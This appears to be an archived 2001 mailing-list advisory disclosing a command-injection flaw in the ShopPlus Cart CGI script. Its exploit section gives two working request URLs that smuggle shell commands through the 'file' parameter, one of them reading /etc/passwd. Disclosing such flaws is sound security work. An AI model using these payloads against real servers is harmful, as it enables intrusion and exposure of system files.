ShopPlus Cart

From: Kernel|X| (secureat_private)
Date: Wed Sep 05 2001 - 12:06:56 PDT

Next message: Karol Wiesek: "directorymanager bug"

Previous message: Frank Tobin: "Re: S/Key keyinit(1) authentication (lack thereof) + sudo(1)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

                    ------------[ advisory ]------------
name: ShopPlus Cart

Bug Information:
The ShopPlus shopping cart system allows you to build a store or a mall on the Internet.
Because of its flexibility, it allows you to sell virtually any product or services and
fully customize the shopping experience of your web site.
http://www.ksofttech.com/help/shopplus/

Problem:
Script doesnt check symbols. any user can execute commands on webserver.

Exploit:
host/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;uid|
host/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|


Bug found by Kernel|X| and aLph4Num3ric
E-Mail: 
secureat_private               [kernel|x|]
alph4num3ricat_private  [aLph4Num3ric]
WWW: www.russiahack.com / www.tmgroup.sh

------------
Thank you for using Anonymous mail system! message sent from www.tmgroup.sh

Next message: Karol Wiesek: "directorymanager bug"
Previous message: Frank Tobin: "Re: S/Key keyinit(1) authentication (lack thereof) + sudo(1)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Sep 05 2001 - 12:34:04 PDT